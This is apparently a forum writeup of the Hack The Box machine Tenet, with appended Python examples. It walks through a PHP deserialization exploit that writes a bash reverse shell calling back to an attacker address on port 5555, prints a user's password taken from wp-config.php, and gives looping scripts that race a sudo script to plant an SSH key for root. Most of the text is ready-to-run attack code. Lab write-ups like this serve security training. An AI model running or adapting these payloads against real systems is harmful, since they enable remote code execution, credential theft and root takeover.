January 17, 2021 at 08:40 PM
This post was last modified: January 17, 2021 at 09:09 PM by dory23. Edited 5 times in total.
1. While checking tenet.htb, we can see neil's comment that there is a backup called sator.
2. Add sator.tenet.htb to /etc/hosts.
3. Remembering there is a sator.php.bak inside sator.tenet.htb, we can access it using sator.tenet.htb/sator.php.bak.
4. While checking the code, we see it is a PHP object injection, so it is a deserialization.
- Check this https://medium.com/swlh/exploiting-php-d...d71f03282a and https://www.exploit-db.com/docs/english/...bility.pdf
We will just edit the code
from this
<?php
class DatabaseExport
{
    public $user_file = 'users.txt';
    public $data = '';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this->data = 'Success';
    }

    public function __destruct()
    {
        // both the file name and the contents come from object properties,
        // which unserialize() below lets the request control
        file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
        echo '[] Database updated <br>';
        // echo 'Gotta get this working properly...';
    }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);   // user input goes straight into unserialize()
$app = new DatabaseExport;
$app->update_db();
?>
to this
<?php
// Local exploit script. serialize() only emits the public properties, so the
// class needs no methods here; the target's own __destruct() does the write
// (keeping __destruct() locally would also drop test.php in this directory).
class DatabaseExport
{
    public $user_file = 'test.php';
    // "ip" is the attacker's listening address, port 5555 as in step 5
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/ip/5555 0>&1\'"); ?>';
}

// 1. unserialize() on the target rebuilds the object; when it is destroyed,
//    __destruct() writes $data to test.php next to sator.php
$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
file_get_contents($url);

// 2. requesting the dropped file runs the reverse shell
//    (this call blocks for as long as the shell is alive)
file_get_contents('http://10.10.10.223/test.php');
?>
5. Then we will get a reverse shell on port 5555.
6. After getting a reverse shell, check wordpress/wp-config.php; there are the credentials of neil:
neil
Opera2113
7. SSH in as the user neil to get user.txt.
8. sudo -l: we can see /usr/local/bin/enableSSH.sh is runnable as root.
9. By checking the code we can see there is a race condition there:
<snipped>
addKey() {
        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)   # -u only picks a name, nothing is created yet
        (umask 110; touch $tmpName)              # created with mode 0666: any user can write to it
        /bin/echo $key >>$tmpName
        checkFile $tmpName
        /bin/cat $tmpName >>/root/.ssh/authorized_keys   # whatever the file holds now reaches root
        /bin/rm $tmpName
}
10. We should generate an id_rsa using ssh-keygen -t rsa.
11. Then on the 10.10.10.223 machine create add_rsa.sh:
#!/bin/bash
# keep overwriting every /tmp/ssh-* file the script creates with our public key
# ("ssh-rsa key" stands for the contents of the id_rsa.pub generated in step 10;
# errors from the glob not matching anything are silenced)
while true
do
    echo "ssh-rsa key" | tee /tmp/ssh-* 2>/dev/null
done
12. Then create a script to run enableSSH.sh and name it 1.sh:
#!/bin/bash
# run the sudo script over and over so add_rsa.sh gets many chances to win the race
while true
do
    sudo /usr/local/bin/enableSSH.sh
done
13. chmod 600 id_rsa, then after a few minutes or seconds SSH in as root.
14. ssh -i id_rsa root@10.10.10.223
If you liked the writeup give rep up and
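The serialized string that step 4's PHP script sends in the `arepo` parameter is never shown in the post. The following is an added example, not dory23's code and not part of the box: it builds that same DatabaseExport gadget by hand in Python, so the payload can be inspected (or sent) without a local PHP install. The listener address 10.10.14.5:5555 and the target URL are placeholders to be replaced.

```python
"""Added example (not from the writeup): build the sator.php payload without PHP.

PHP's serialize() on the exploit class emits a fixed text format; writing that
format by hand shows what actually crosses the wire in the `arepo` parameter.
Assumptions: the attacker's listener is 10.10.14.5:5555 and sator.php lives at
http://10.10.10.223/sator.php (both placeholders, change them to your own).
"""
from urllib.parse import urlencode
import urllib.request

ATTACKER_IP = "10.10.14.5"      # assumption: your tun0 address
ATTACKER_PORT = 5555
TARGET = "http://10.10.10.223/sator.php"


def php_str(s):
    # PHP string: s:<byte length>:"<raw bytes>";  (length counts bytes, not chars)
    return 's:%d:"%s";' % (len(s.encode("utf-8")), s)


def php_object(class_name, props):
    # PHP object with public properties only:
    # O:<len>:"<class>":<count>:{<name><value>...}
    body = "".join(php_str(k) + php_str(v) for k, v in props.items())
    return 'O:%d:"%s":%d:{%s}' % (
        len(class_name.encode("utf-8")), class_name, len(props), body)


def dropper(ip, port):
    # the same one-liner the writeup plants in test.php
    return "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/%s/%d 0>&1'\"); ?>" % (ip, port)


def gadget(user_file="test.php", data=None):
    # The DatabaseExport gadget: on the target, __destruct() runs
    # file_put_contents(__DIR__ . '/' . user_file, data)
    if data is None:
        data = dropper(ATTACKER_IP, ATTACKER_PORT)
    return php_object("DatabaseExport", {"user_file": user_file, "data": data})


def exploit_url(target=TARGET, **kw):
    # urlencode() percent-encodes the payload; PHP's $_GET decodes it back
    return target + "?" + urlencode({"arepo": gadget(**kw)})


def fire(target=TARGET):
    # Network steps kept separate so everything above runs offline.
    # First request: unserialize() builds the object, __destruct() writes test.php.
    urllib.request.urlopen(exploit_url(target), timeout=10).read()
    # Second request: runs the dropped file; blocks while the shell is up.
    urllib.request.urlopen(target.rsplit("/", 1)[0] + "/test.php", timeout=10).read()


if __name__ == "__main__":
    print(exploit_url())
```

The serialized text makes the root cause obvious: the class name and every property value arrive from the client, and the only thing standing between them and a file write is the `unserialize()` call. The fix on the application side is to not unserialize untrusted input at all (or at least pass `['allowed_classes' => false]`), not to filter the file name.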
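Steps 9 to 13 rely on two facts about addKey() that the post states but does not show: the temp file is world-writable, and its contents are copied into authorized_keys only after an attacker has had a chance to replace them. The following is an added example, not dory23's code, that re-creates the temp-file handling in Python inside a scratch directory (instead of /tmp, and without sudo) beside the atomic mkstemp version, so both facts can be checked directly.

```python
"""Added example (not from the writeup): the addKey() race, re-created locally.

Mirrors enableSSH.sh's mktemp -u / touch / echo / cat / rm sequence and one
pass of neil's `tee /tmp/ssh-*` loop, then the safe alternative.
Assumption: everything runs inside one temporary directory instead of /tmp.
"""
import os
import stat
import tempfile


def insecure_addkey(key, tmpdir):
    # mktemp -u only chooses a name; touch under umask 110 then creates it with
    # mode 0666, so any local user can open it for writing.
    old_umask = os.umask(0o110)
    try:
        name = tempfile.mktemp(prefix="ssh-", dir=tmpdir)  # /tmp/ssh-XXXXXXXX
        open(name, "a").close()                            # touch $tmpName
    finally:
        os.umask(old_umask)
    with open(name, "a") as f:                             # /bin/echo $key >> $tmpName
        f.write(key + "\n")
    mode = stat.S_IMODE(os.stat(name).st_mode)
    return name, bool(mode & stat.S_IWOTH)


def attacker_loop_iteration(tmpdir, attacker_key):
    # One pass of add_rsa.sh: echo "ssh-rsa key" | tee /tmp/ssh-*
    hits = 0
    for entry in os.listdir(tmpdir):
        if entry.startswith("ssh-"):
            with open(os.path.join(tmpdir, entry), "w") as f:
                f.write(attacker_key + "\n")
            hits += 1
    return hits


def finish_addkey(name, authorized_keys):
    # /bin/cat $tmpName >> /root/.ssh/authorized_keys ; /bin/rm $tmpName
    with open(name) as src, open(authorized_keys, "a") as dst:
        dst.write(src.read())
    os.remove(name)


def secure_addkey(key, tmpdir):
    # mkstemp() creates the file atomically (O_CREAT|O_EXCL) with mode 0600, so
    # there is no window in which another user can pre-create or write to it.
    fd, name = tempfile.mkstemp(prefix="ssh-", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(key + "\n")
    mode = stat.S_IMODE(os.stat(name).st_mode)
    return name, bool(mode & stat.S_IWOTH)


def race_demo():
    # Returns (temp file was world-writable, final authorized_keys contents).
    with tempfile.TemporaryDirectory() as tmpdir:
        auth = os.path.join(tmpdir, "authorized_keys")
        name, world_writable = insecure_addkey("ssh-rsa LEGIT-KEY root", tmpdir)
        attacker_loop_iteration(tmpdir, "ssh-rsa ATTACKER-KEY neil")  # lands in the window
        finish_addkey(name, auth)
        with open(auth) as f:
            return world_writable, f.read()


def secure_demo():
    # Returns whether the mkstemp() file was world-writable (it is not).
    with tempfile.TemporaryDirectory() as tmpdir:
        name, world_writable = secure_addkey("ssh-rsa LEGIT-KEY root", tmpdir)
        os.remove(name)
        return world_writable


if __name__ == "__main__":
    print(race_demo())
    print(secure_demo())
```

In the real box the two loops run as neil while the script runs as root, so the world-writable mode is what makes the overwrite possible; here both sides run as the same user, which is why the demo also reports the mode bit rather than relying on the write succeeding. Beyond the script itself, using `mktemp` without `-u` (or writing the key to the target file directly without a temp file) removes the window.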